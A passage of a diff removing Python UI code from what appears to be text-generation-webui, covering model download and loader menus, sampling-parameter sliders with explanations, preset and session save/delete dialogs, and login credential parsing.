-        branch = repo_id_parts[1] if len(repo_id_parts) > 1 else "main"
-        check = False
-
-        progress(0.0)
-        yield ("Cleaning up the model/branch names")
-        model, branch = downloader.sanitize_model_and_branch_names(model, branch)
-
-        yield ("Getting the download links from Hugging Face")
-        links, sha256, is_lora = downloader.get_download_links_from_huggingface(model, branch, text_only=False)
-
-        yield ("Getting the output folder")
-        base_folder = shared.args.lora_dir if is_lora else shared.args.model_dir
-        output_folder = downloader.get_output_folder(model, branch, is_lora, base_folder=base_folder)
-
-        if check:
-            progress(0.5)
-            yield ("Checking previously downloaded files")
-            downloader.check_model_files(model, branch, links, sha256, output_folder)
-            progress(1.0)
-        else:
-            yield (f"Downloading files to {output_folder}")
-            downloader.download_model_files(model, branch, links, sha256, output_folder, progress_bar=progress, threads=1)
-            yield ("Done!")
-    except Exception:
-        progress(1.0)
-        yield traceback.format_exc()
-
-
-def create_model_menus():
-    # Finding the default values for the GPU and CPU memories
-    total_mem = []
-    for i in range(torch.cuda.device_count()):
-        total_mem.append(math.floor(torch.cuda.get_device_properties(i).total_memory / (1024 * 1024)))
-
-    default_gpu_mem = []
-    if shared.args.gpu_memory is not None and len(shared.args.gpu_memory) > 0:
-        for i in shared.args.gpu_memory:
-            if 'mib' in i.lower():
-                default_gpu_mem.append(int(re.sub('[a-zA-Z ]', '', i)))
-            else:
-                default_gpu_mem.append(int(re.sub('[a-zA-Z ]', '', i)) * 1000)
-
-    while len(default_gpu_mem) < len(total_mem):
-        default_gpu_mem.append(0)
-
-    total_cpu_mem = math.floor(psutil.virtual_memory().total / (1024 *
1024)) - if shared.args.cpu_memory is not None: - default_cpu_mem = re.sub('[a-zA-Z ]', '', shared.args.cpu_memory) - else: - default_cpu_mem = 0 - - with gr.Row(): - with gr.Column(): - with gr.Row(): - with gr.Column(): - with gr.Row(): - shared.gradio['model_menu'] = gr.Dropdown(choices=utils.get_available_models(), value=shared.model_name, label='Model', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['model_menu'], lambda: None, lambda: {'choices': utils.get_available_models()}, 'refresh-button') - load = gr.Button("Load", visible=not shared.settings['autoload_model'], elem_classes='refresh-button') - unload = gr.Button("Unload", elem_classes='refresh-button') - reload = gr.Button("Reload", elem_classes='refresh-button') - save_settings = gr.Button("Save settings", elem_classes='refresh-button') - - with gr.Column(): - with gr.Row(): - shared.gradio['lora_menu'] = gr.Dropdown(multiselect=True, choices=utils.get_available_loras(), value=shared.lora_names, label='LoRA(s)', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['lora_menu'], lambda: None, lambda: {'choices': utils.get_available_loras(), 'value': shared.lora_names}, 'refresh-button') - shared.gradio['lora_menu_apply'] = gr.Button(value='Apply LoRAs', elem_classes='refresh-button') - - with gr.Row(): - with gr.Column(): - shared.gradio['loader'] = gr.Dropdown(label="Model loader", choices=["Transformers", "ExLlama_HF", "ExLlama", "AutoGPTQ", "GPTQ-for-LLaMa", "llama.cpp", "llamacpp_HF"], value=None) - with gr.Box(): - with gr.Row(): - with gr.Column(): - for i in range(len(total_mem)): - shared.gradio[f'gpu_memory_{i}'] = gr.Slider(label=f"gpu-memory in MiB for device :{i}", maximum=total_mem[i], value=default_gpu_mem[i]) - - shared.gradio['cpu_memory'] = gr.Slider(label="cpu-memory in MiB", maximum=total_cpu_mem, value=default_cpu_mem) - shared.gradio['transformers_info'] = gr.Markdown('load-in-4bit params:') - shared.gradio['compute_dtype'] = 
gr.Dropdown(label="compute_dtype", choices=["bfloat16", "float16", "float32"], value=shared.args.compute_dtype) - shared.gradio['quant_type'] = gr.Dropdown(label="quant_type", choices=["nf4", "fp4"], value=shared.args.quant_type) - shared.gradio['threads'] = gr.Slider(label="threads", minimum=0, step=1, maximum=32, value=shared.args.threads) - shared.gradio['n_batch'] = gr.Slider(label="n_batch", minimum=1, maximum=2048, value=shared.args.n_batch) - shared.gradio['n_gpu_layers'] = gr.Slider(label="n-gpu-layers", minimum=0, maximum=128, value=shared.args.n_gpu_layers) - shared.gradio['n_ctx'] = gr.Slider(minimum=0, maximum=16384, step=256, label="n_ctx", value=shared.args.n_ctx) - shared.gradio['wbits'] = gr.Dropdown(label="wbits", choices=["None", 1, 2, 3, 4, 8], value=str(shared.args.wbits) if shared.args.wbits > 0 else "None") - shared.gradio['groupsize'] = gr.Dropdown(label="groupsize", choices=["None", 32, 64, 128, 1024], value=str(shared.args.groupsize) if shared.args.groupsize > 0 else "None") - shared.gradio['model_type'] = gr.Dropdown(label="model_type", choices=["None", "llama", "opt", "gptj"], value=shared.args.model_type or "None") - shared.gradio['pre_layer'] = gr.Slider(label="pre_layer", minimum=0, maximum=100, value=shared.args.pre_layer[0] if shared.args.pre_layer is not None else 0) - shared.gradio['autogptq_info'] = gr.Markdown('* ExLlama_HF is recommended over AutoGPTQ for models derived from LLaMA.') - shared.gradio['gpu_split'] = gr.Textbox(label='gpu-split', info='Comma-separated list of VRAM (in GB) to use per GPU. Example: 20,7,7') - shared.gradio['max_seq_len'] = gr.Slider(label='max_seq_len', minimum=2048, maximum=16384, step=256, info='Maximum sequence length.', value=shared.args.max_seq_len) - shared.gradio['compress_pos_emb'] = gr.Slider(label='compress_pos_emb', minimum=1, maximum=8, step=1, info='Positional embeddings compression factor. 
Should typically be set to max_seq_len / 2048.', value=shared.args.compress_pos_emb) - shared.gradio['alpha_value'] = gr.Slider(label='alpha_value', minimum=1, maximum=32, step=1, info='Positional embeddings alpha factor for NTK RoPE scaling. Scaling is not identical to embedding compression. Use either this or compress_pos_emb, not both.', value=shared.args.alpha_value) - - with gr.Column(): - shared.gradio['triton'] = gr.Checkbox(label="triton", value=shared.args.triton) - shared.gradio['no_inject_fused_attention'] = gr.Checkbox(label="no_inject_fused_attention", value=shared.args.no_inject_fused_attention, info='Disable fused attention. Fused attention improves inference performance but uses more VRAM. Disable if running low on VRAM.') - shared.gradio['no_inject_fused_mlp'] = gr.Checkbox(label="no_inject_fused_mlp", value=shared.args.no_inject_fused_mlp, info='Affects Triton only. Disable fused MLP. Fused MLP improves performance but uses more VRAM. Disable if running low on VRAM.') - shared.gradio['no_use_cuda_fp16'] = gr.Checkbox(label="no_use_cuda_fp16", value=shared.args.no_use_cuda_fp16, info='This can make models faster on some systems.') - shared.gradio['desc_act'] = gr.Checkbox(label="desc_act", value=shared.args.desc_act, info='\'desc_act\', \'wbits\', and \'groupsize\' are used for old models without a quantize_config.json.') - shared.gradio['cpu'] = gr.Checkbox(label="cpu", value=shared.args.cpu) - shared.gradio['load_in_8bit'] = gr.Checkbox(label="load-in-8bit", value=shared.args.load_in_8bit) - shared.gradio['bf16'] = gr.Checkbox(label="bf16", value=shared.args.bf16) - shared.gradio['auto_devices'] = gr.Checkbox(label="auto-devices", value=shared.args.auto_devices) - shared.gradio['disk'] = gr.Checkbox(label="disk", value=shared.args.disk) - shared.gradio['load_in_4bit'] = gr.Checkbox(label="load-in-4bit", value=shared.args.load_in_4bit) - shared.gradio['use_double_quant'] = gr.Checkbox(label="use_double_quant", value=shared.args.use_double_quant) - 
shared.gradio['no_mmap'] = gr.Checkbox(label="no-mmap", value=shared.args.no_mmap) - shared.gradio['low_vram'] = gr.Checkbox(label="low-vram", value=shared.args.low_vram) - shared.gradio['mlock'] = gr.Checkbox(label="mlock", value=shared.args.mlock) - shared.gradio['llama_cpp_seed'] = gr.Number(label='Seed (0 for random)', value=shared.args.llama_cpp_seed) - shared.gradio['trust_remote_code'] = gr.Checkbox(label="trust-remote-code", value=shared.args.trust_remote_code, info='Make sure to inspect the .py files inside the model folder before loading it with this option enabled.') - shared.gradio['gptq_for_llama_info'] = gr.Markdown('GPTQ-for-LLaMa is currently 2x faster than AutoGPTQ on some systems. It is installed by default with the one-click installers. Otherwise, it has to be installed manually following the instructions here: [instructions](https://github.com/oobabooga/text-generation-webui/blob/main/docs/GPTQ-models-(4-bit-mode).md#installation-1).') - shared.gradio['exllama_info'] = gr.Markdown('For more information, consult the [docs](https://github.com/oobabooga/text-generation-webui/blob/main/docs/ExLlama.md).') - shared.gradio['exllama_HF_info'] = gr.Markdown('ExLlama_HF is a wrapper that lets you use ExLlama like a Transformers model, which means it can use the Transformers samplers. It\'s a bit slower than the regular ExLlama.') - shared.gradio['llamacpp_HF_info'] = gr.Markdown('llamacpp_HF is a wrapper that lets you use llama.cpp like a Transformers model, which means it can use the Transformers samplers. It works, but it\'s experimental and slow. 
Contributions are welcome.\n\nTo use it, make sure to first download oobabooga/llama-tokenizer under "Download custom model or LoRA".') - - with gr.Column(): - with gr.Row(): - shared.gradio['autoload_model'] = gr.Checkbox(value=shared.settings['autoload_model'], label='Autoload the model', info='Whether to load the model as soon as it is selected in the Model dropdown.') - - shared.gradio['custom_model_menu'] = gr.Textbox(label="Download custom model or LoRA", info="Enter the Hugging Face username/model path, for instance: facebook/galactica-125m. To specify a branch, add it at the end after a \":\" character like this: facebook/galactica-125m:main") - shared.gradio['download_model_button'] = gr.Button("Download") - - with gr.Row(): - shared.gradio['model_status'] = gr.Markdown('No model is loaded' if shared.model_name == 'None' else 'Ready') - - shared.gradio['loader'].change(loaders.make_loader_params_visible, gradio('loader'), gradio(loaders.get_all_params())) - - # In this event handler, the interface state is read and updated - # with the model defaults (if any), and then the model is loaded - # unless "autoload_model" is unchecked - shared.gradio['model_menu'].change( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - apply_model_settings_to_state, gradio('model_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False).then( - update_model_parameters, gradio('interface_state'), None).then( - load_model_wrapper, gradio('model_menu', 'loader', 'autoload_model'), gradio('model_status'), show_progress=False) - - load.click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - update_model_parameters, gradio('interface_state'), None).then( - partial(load_model_wrapper, autoload=True), gradio('model_menu', 'loader'), gradio('model_status'), 
show_progress=False) - - unload.click( - unload_model, None, None).then( - lambda: "Model unloaded", None, gradio('model_status')) - - reload.click( - unload_model, None, None).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - update_model_parameters, gradio('interface_state'), None).then( - partial(load_model_wrapper, autoload=True), gradio('model_menu', 'loader'), gradio('model_status'), show_progress=False) - - save_settings.click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - save_model_settings, gradio('model_menu', 'interface_state'), gradio('model_status'), show_progress=False) - - shared.gradio['lora_menu_apply'].click(load_lora_wrapper, gradio('lora_menu'), gradio('model_status'), show_progress=False) - shared.gradio['download_model_button'].click(download_model_wrapper, gradio('custom_model_menu'), gradio('model_status'), show_progress=True) - shared.gradio['autoload_model'].change(lambda x: gr.update(visible=not x), gradio('autoload_model'), load) - - -def create_chat_settings_menus(): - if not shared.is_chat(): - return - - with gr.Box(): - gr.Markdown("Chat parameters") - with gr.Row(): - with gr.Column(): - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - shared.gradio['chat_generation_attempts'] = gr.Slider(minimum=shared.settings['chat_generation_attempts_min'], maximum=shared.settings['chat_generation_attempts_max'], value=shared.settings['chat_generation_attempts'], step=1, label='Generation attempts (for longer replies)', info='New generations will be called until either this number is reached or no new content is generated between two iterations.') - - with gr.Column(): - shared.gradio['stop_at_newline'] = gr.Checkbox(value=shared.settings['stop_at_newline'], label='Stop generating at 
new line character') - - -def create_settings_menus(default_preset): - generate_params = presets.load_preset(default_preset) - with gr.Row(): - with gr.Column(): - with gr.Row(): - shared.gradio['preset_menu'] = gr.Dropdown(choices=utils.get_available_presets(), value=default_preset if not shared.args.flexgen else 'Naive', label='Generation parameters preset', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['preset_menu'], lambda: None, lambda: {'choices': utils.get_available_presets()}, 'refresh-button') - shared.gradio['save_preset'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_preset'] = gr.Button('🗑️', elem_classes='refresh-button') - - with gr.Column(): - shared.gradio['seed'] = gr.Number(value=shared.settings['seed'], label='Seed (-1 for random)') - - with gr.Row(): - with gr.Column(): - with gr.Box(): - gr.Markdown('Main parameters') - with gr.Row(): - with gr.Column(): - shared.gradio['temperature'] = gr.Slider(0.01, 1.99, value=generate_params['temperature'], step=0.01, label='temperature') - shared.gradio['top_p'] = gr.Slider(0.0, 1.0, value=generate_params['top_p'], step=0.01, label='top_p') - shared.gradio['top_k'] = gr.Slider(0, 200, value=generate_params['top_k'], step=1, label='top_k') - shared.gradio['typical_p'] = gr.Slider(0.0, 1.0, value=generate_params['typical_p'], step=0.01, label='typical_p') - shared.gradio['epsilon_cutoff'] = gr.Slider(0, 9, value=generate_params['epsilon_cutoff'], step=0.01, label='epsilon_cutoff') - shared.gradio['eta_cutoff'] = gr.Slider(0, 20, value=generate_params['eta_cutoff'], step=0.01, label='eta_cutoff') - - with gr.Column(): - shared.gradio['repetition_penalty'] = gr.Slider(1.0, 1.5, value=generate_params['repetition_penalty'], step=0.01, label='repetition_penalty') - shared.gradio['repetition_penalty_range'] = gr.Slider(0, 4096, step=64, value=generate_params['repetition_penalty_range'], label='repetition_penalty_range') - 
shared.gradio['encoder_repetition_penalty'] = gr.Slider(0.8, 1.5, value=generate_params['encoder_repetition_penalty'], step=0.01, label='encoder_repetition_penalty') - shared.gradio['no_repeat_ngram_size'] = gr.Slider(0, 20, step=1, value=generate_params['no_repeat_ngram_size'], label='no_repeat_ngram_size') - shared.gradio['min_length'] = gr.Slider(0, 2000, step=1, value=generate_params['min_length'], label='min_length') - shared.gradio['tfs'] = gr.Slider(0.0, 1.0, value=generate_params['tfs'], step=0.01, label='tfs') - shared.gradio['top_a'] = gr.Slider(0.0, 1.0, value=generate_params['top_a'], step=0.01, label='top_a') - shared.gradio['do_sample'] = gr.Checkbox(value=generate_params['do_sample'], label='do_sample') - - with gr.Accordion("Learn more", open=False): - gr.Markdown(""" - - Not all parameters are used by all loaders. See [this page](https://github.com/oobabooga/text-generation-webui/blob/main/docs/Generation-parameters.md) for details. - - For a technical description of the parameters, the [transformers documentation](https://huggingface.co/docs/transformers/main_classes/text_generation#transformers.GenerationConfig) is a good reference. - - The best presets, according to the [Preset Arena](https://github.com/oobabooga/oobabooga.github.io/blob/main/arena/results.md) experiment, are: - - * Instruction following: - 1) Divine Intellect - 2) Big O - 3) simple-1 - 4) Space Alien - 5) StarChat - 6) Titanic - 7) tfs-with-top-a - 8) Asterism - 9) Contrastive Search - - * Chat: - 1) Midnight Enigma - 2) Yara - 3) Shortwave - 4) Kobold-Godlike - - ### Temperature - Primary factor to control randomness of outputs. 0 = deterministic (only the most likely token is used). Higher value = more randomness. - ### top_p - If not set to 1, select tokens with probabilities adding up to less than this number. Higher value = higher range of possible random results. - ### top_k - Similar to top_p, but select instead only the top_k most likely tokens. 
Higher value = higher range of possible random results. - ### typical_p - If not set to 1, select only tokens that are at least this much more likely to appear than random tokens, given the prior text. - ### epsilon_cutoff - In units of 1e-4; a reasonable value is 3. This sets a probability floor below which tokens are excluded from being sampled. Should be used with top_p, top_k, and eta_cutoff set to 0. - ### eta_cutoff - In units of 1e-4; a reasonable value is 3. Should be used with top_p, top_k, and epsilon_cutoff set to 0. - ### repetition_penalty - Exponential penalty factor for repeating prior tokens. 1 means no penalty, higher value = less repetition, lower value = more repetition. - ### repetition_penalty_range - The number of most recent tokens to consider for repetition penalty. 0 makes all tokens be used. - ### encoder_repetition_penalty - Also known as the "Hallucinations filter". Used to penalize tokens that are *not* in the prior text. Higher value = more likely to stay in context, lower value = more likely to diverge. - ### no_repeat_ngram_size - If not set to 0, specifies the length of token sets that are completely blocked from repeating at all. Higher values = blocks larger phrases, lower values = blocks words or letters from repeating. Only 0 or high values are a good idea in most cases. - ### min_length - Minimum generation length in tokens. - ### penalty_alpha - Contrastive Search is enabled by setting this to greater than zero and unchecking "do_sample". It should be used with a low value of top_k, for instance, top_k = 4. 
- - """, elem_classes="markdown") - - with gr.Column(): - create_chat_settings_menus() - with gr.Box(): - with gr.Row(): - with gr.Column(): - gr.Markdown('Contrastive search') - shared.gradio['penalty_alpha'] = gr.Slider(0, 5, value=generate_params['penalty_alpha'], label='penalty_alpha') - - gr.Markdown('Beam search') - shared.gradio['num_beams'] = gr.Slider(1, 20, step=1, value=generate_params['num_beams'], label='num_beams') - shared.gradio['length_penalty'] = gr.Slider(-5, 5, value=generate_params['length_penalty'], label='length_penalty') - shared.gradio['early_stopping'] = gr.Checkbox(value=generate_params['early_stopping'], label='early_stopping') - - with gr.Column(): - gr.Markdown('Mirostat (mode=1 is only for llama.cpp)') - shared.gradio['mirostat_mode'] = gr.Slider(0, 2, step=1, value=generate_params['mirostat_mode'], label='mirostat_mode') - shared.gradio['mirostat_tau'] = gr.Slider(0, 10, step=0.01, value=generate_params['mirostat_tau'], label='mirostat_tau') - shared.gradio['mirostat_eta'] = gr.Slider(0, 1, step=0.01, value=generate_params['mirostat_eta'], label='mirostat_eta') - - with gr.Box(): - with gr.Row(): - with gr.Column(): - shared.gradio['truncation_length'] = gr.Slider(value=shared.settings['truncation_length'], minimum=shared.settings['truncation_length_min'], maximum=shared.settings['truncation_length_max'], step=256, label='Truncate the prompt up to this length', info='The leftmost tokens are removed if the prompt exceeds this length. Most models require this to be at most 2048.') - shared.gradio['custom_stopping_strings'] = gr.Textbox(lines=1, value=shared.settings["custom_stopping_strings"] or None, label='Custom stopping strings', info='In addition to the defaults. Written between "" and separated by commas. 
For instance: "\\nYour Assistant:", "\\nThe assistant:"') - with gr.Column(): - shared.gradio['ban_eos_token'] = gr.Checkbox(value=shared.settings['ban_eos_token'], label='Ban the eos_token', info='Forces the model to never end the generation prematurely.') - shared.gradio['add_bos_token'] = gr.Checkbox(value=shared.settings['add_bos_token'], label='Add the bos_token to the beginning of prompts', info='Disabling this can make the replies more creative.') - - shared.gradio['skip_special_tokens'] = gr.Checkbox(value=shared.settings['skip_special_tokens'], label='Skip special tokens', info='Some specific models need this unset.') - shared.gradio['stream'] = gr.Checkbox(value=not shared.args.no_stream, label='Activate text streaming') - - shared.gradio['preset_menu'].change(presets.load_preset_for_ui, gradio('preset_menu', 'interface_state'), gradio('interface_state', 'do_sample', 'temperature', 'top_p', 'typical_p', 'epsilon_cutoff', 'eta_cutoff', 'repetition_penalty', 'repetition_penalty_range', 'encoder_repetition_penalty', 'top_k', 'min_length', 'no_repeat_ngram_size', 'num_beams', 'penalty_alpha', 'length_penalty', 'early_stopping', 'mirostat_mode', 'mirostat_tau', 'mirostat_eta', 'tfs', 'top_a')) - - -def create_file_saving_menus(): - - # Text file saver - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['file_saver']: - shared.gradio['save_filename'] = gr.Textbox(lines=1, label='File name') - shared.gradio['save_root'] = gr.Textbox(lines=1, label='File folder', info='For reference. 
Unchangeable.', interactive=False) - shared.gradio['save_contents'] = gr.Textbox(lines=10, label='File contents') - with gr.Row(): - shared.gradio['save_confirm'] = gr.Button('Save', elem_classes="small-button") - shared.gradio['save_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - # Text file deleter - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['file_deleter']: - shared.gradio['delete_filename'] = gr.Textbox(lines=1, label='File name') - shared.gradio['delete_root'] = gr.Textbox(lines=1, label='File folder', info='For reference. Unchangeable.', interactive=False) - with gr.Row(): - shared.gradio['delete_confirm'] = gr.Button('Delete', elem_classes="small-button", variant='stop') - shared.gradio['delete_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - # Character saver/deleter - if shared.is_chat(): - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['character_saver']: - shared.gradio['save_character_filename'] = gr.Textbox(lines=1, label='File name', info='The character will be saved to your characters/ folder with this base filename.') - with gr.Row(): - shared.gradio['save_character_confirm'] = gr.Button('Save', elem_classes="small-button") - shared.gradio['save_character_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - with gr.Box(visible=False, elem_classes='file-saver') as shared.gradio['character_deleter']: - gr.Markdown('Confirm the character deletion?') - with gr.Row(): - shared.gradio['delete_character_confirm'] = gr.Button('Delete', elem_classes="small-button", variant='stop') - shared.gradio['delete_character_cancel'] = gr.Button('Cancel', elem_classes="small-button") - - -def create_file_saving_event_handlers(): - shared.gradio['save_confirm'].click( - lambda x, y, z: utils.save_file(x + y, z), gradio('save_root', 'save_filename', 'save_contents'), None).then( - lambda: gr.update(visible=False), None, gradio('file_saver')) - - 
shared.gradio['delete_confirm'].click( - lambda x, y: utils.delete_file(x + y), gradio('delete_root', 'delete_filename'), None).then( - lambda: gr.update(visible=False), None, gradio('file_deleter')) - - shared.gradio['delete_cancel'].click(lambda: gr.update(visible=False), None, gradio('file_deleter')) - shared.gradio['save_cancel'].click(lambda: gr.update(visible=False), None, gradio('file_saver')) - if shared.is_chat(): - shared.gradio['save_character_confirm'].click( - chat.save_character, gradio('name2', 'greeting', 'context', 'character_picture', 'save_character_filename'), None).then( - lambda: gr.update(visible=False), None, gradio('character_saver')) - - shared.gradio['delete_character_confirm'].click( - chat.delete_character, gradio('character_menu'), None).then( - lambda: gr.update(visible=False), None, gradio('character_deleter')).then( - lambda: gr.update(choices=utils.get_available_characters()), None, gradio('character_menu')) - - shared.gradio['save_character_cancel'].click(lambda: gr.update(visible=False), None, gradio('character_saver')) - shared.gradio['delete_character_cancel'].click(lambda: gr.update(visible=False), None, gradio('character_deleter')) - - shared.gradio['save_preset'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - presets.generate_preset_yaml, gradio('interface_state'), gradio('save_contents')).then( - lambda: 'presets/', None, gradio('save_root')).then( - lambda: 'My Preset.yaml', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_preset'].click( - lambda x: f'{x}.yaml', gradio('preset_menu'), gradio('delete_filename')).then( - lambda: 'presets/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - if not shared.args.multi_user: - - def load_session(session, state): - with open(Path(f'logs/{session}.json'), 'r') as f: - 
state.update(json.loads(f.read())) - - if shared.is_chat(): - chat.save_persistent_history(state['history'], state['character_menu'], state['mode']) - - return state - - if shared.is_chat(): - shared.gradio['save_session'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: json.dumps(x, indent=4), gradio('interface_state'), gradio('save_contents')).then( - lambda: 'logs/', None, gradio('save_root')).then( - lambda x: f'session_{shared.get_mode()}_{x + "_" if x not in ["None", None, ""] else ""}{utils.current_time()}.json', gradio('character_menu'), gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['session_menu'].change( - load_session, gradio('session_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - else: - shared.gradio['save_session'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: json.dumps(x, indent=4), gradio('interface_state'), gradio('save_contents')).then( - lambda: 'logs/', None, gradio('save_root')).then( - lambda: f'session_{shared.get_mode()}_{utils.current_time()}.json', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['session_menu'].change( - load_session, gradio('session_menu', 'interface_state'), gradio('interface_state')).then( - ui.apply_interface_values, gradio('interface_state'), gradio(ui.list_interface_input_elements()), show_progress=False) - - shared.gradio['delete_session'].click( - lambda x: f'{x}.json', gradio('session_menu'), gradio('delete_filename')).then( - lambda: 'logs/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - 
-def set_interface_arguments(interface_mode, extensions, bool_active): - modes = ["default", "notebook", "chat", "cai_chat"] - cmd_list = vars(shared.args) - bool_list = [k for k in cmd_list if type(cmd_list[k]) is bool and k not in modes] - - shared.args.extensions = extensions - for k in modes[1:]: - setattr(shared.args, k, False) - if interface_mode != "default": - setattr(shared.args, interface_mode, True) - - for k in bool_list: - setattr(shared.args, k, False) - for k in bool_active: - setattr(shared.args, k, True) - - shared.need_restart = True - - -def create_interface(): - - # Defining some variables - gen_events = [] - default_preset = shared.settings['preset'] - default_text = load_prompt(shared.settings['prompt']) - title = 'Text generation web UI' - - # Authentication variables - auth = None - gradio_auth_creds = [] - if shared.args.gradio_auth: - gradio_auth_creds += [x.strip() for x in shared.args.gradio_auth.strip('"').replace('\n', '').split(',') if x.strip()] - if shared.args.gradio_auth_path is not None: - with open(shared.args.gradio_auth_path, 'r', encoding="utf8") as file: - for line in file.readlines(): - gradio_auth_creds += [x.strip() for x in line.split(',') if x.strip()] - if gradio_auth_creds: - auth = [tuple(cred.split(':')) for cred in gradio_auth_creds] - - # Importing the extension files and executing their setup() functions - if shared.args.extensions is not None and len(shared.args.extensions) > 0: - extensions_module.load_extensions() - - # css/js strings - css = ui.css if not shared.is_chat() else ui.css + ui.chat_css - js = ui.main_js if not shared.is_chat() else ui.main_js + ui.chat_js - css += apply_extensions('css') - js += apply_extensions('js') - - with gr.Blocks(css=css, analytics_enabled=False, title=title, theme=ui.theme) as shared.gradio['interface']: - if Path("notification.mp3").exists(): - shared.gradio['audio_notification'] = gr.Audio(interactive=False, value="notification.mp3", elem_id="audio_notification", 
visible=False) - audio_notification_js = "document.querySelector('#audio_notification audio')?.play();" - else: - audio_notification_js = "" - - # Floating menus for saving/deleting files - create_file_saving_menus() - - # Create chat mode interface - if shared.is_chat(): - shared.input_elements = ui.list_interface_input_elements() - - shared.gradio.update({ - 'interface_state': gr.State({k: None for k in shared.input_elements}), - 'Chat input': gr.State(), - 'dummy': gr.State(), - 'history': gr.State({'internal': [], 'visible': []}), - }) - - with gr.Tab('Text generation', elem_id='main'): - shared.gradio['display'] = gr.HTML(value=chat_html_wrapper({'internal': [], 'visible': []}, shared.settings['name1'], shared.settings['name2'], 'chat', 'cai-chat')) - shared.gradio['textbox'] = gr.Textbox(label='Input') - with gr.Row(): - shared.gradio['Stop'] = gr.Button('Stop', elem_id='stop') - shared.gradio['Generate'] = gr.Button('Generate', elem_id='Generate', variant='primary') - shared.gradio['Continue'] = gr.Button('Continue') - - with gr.Row(): - shared.gradio['Impersonate'] = gr.Button('Impersonate') - shared.gradio['Regenerate'] = gr.Button('Regenerate') - shared.gradio['Remove last'] = gr.Button('Remove last') - - with gr.Row(): - shared.gradio['Copy last reply'] = gr.Button('Copy last reply') - shared.gradio['Replace last reply'] = gr.Button('Replace last reply') - shared.gradio['Send dummy message'] = gr.Button('Send dummy message') - shared.gradio['Send dummy reply'] = gr.Button('Send dummy reply') - - with gr.Row(): - shared.gradio['Clear history'] = gr.Button('Clear history') - shared.gradio['Clear history-confirm'] = gr.Button('Confirm', variant='stop', visible=False) - shared.gradio['Clear history-cancel'] = gr.Button('Cancel', visible=False) - - with gr.Row(): - shared.gradio['start_with'] = gr.Textbox(label='Start reply with', placeholder='Sure thing!', value=shared.settings['start_with']) - - with gr.Row(): - shared.gradio['mode'] = 
gr.Radio(choices=['chat', 'chat-instruct', 'instruct'], value=shared.settings['mode'] if shared.settings['mode'] in ['chat', 'instruct', 'chat-instruct'] else 'chat', label='Mode', info='Defines how the chat prompt is generated. In instruct and chat-instruct modes, the instruction template selected under "Chat settings" must match the current model.') - shared.gradio['chat_style'] = gr.Dropdown(choices=utils.get_available_chat_styles(), label='Chat style', value=shared.settings['chat_style'], visible=shared.settings['mode'] != 'instruct') - - with gr.Tab('Chat settings', elem_id='chat-settings'): - - with gr.Tab("Character"): - with gr.Row(): - with gr.Column(scale=8): - with gr.Row(): - shared.gradio['character_menu'] = gr.Dropdown(value='None', choices=utils.get_available_characters(), label='Character', elem_id='character-menu', info='Used in chat and chat-instruct modes.', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['character_menu'], lambda: None, lambda: {'choices': utils.get_available_characters()}, 'refresh-button') - shared.gradio['save_character'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_character'] = gr.Button('🗑️', elem_classes='refresh-button') - - shared.gradio['name1'] = gr.Textbox(value=shared.settings['name1'], lines=1, label='Your name') - shared.gradio['name2'] = gr.Textbox(value=shared.settings['name2'], lines=1, label='Character\'s name') - shared.gradio['context'] = gr.Textbox(value=shared.settings['context'], lines=4, label='Context') - shared.gradio['greeting'] = gr.Textbox(value=shared.settings['greeting'], lines=4, label='Greeting') - - with gr.Column(scale=1): - shared.gradio['character_picture'] = gr.Image(label='Character picture', type='pil') - shared.gradio['your_picture'] = gr.Image(label='Your picture', type='pil', value=Image.open(Path('cache/pfp_me.png')) if Path('cache/pfp_me.png').exists() else None) - - with gr.Tab("Instruction template"): - with gr.Row(): - with 
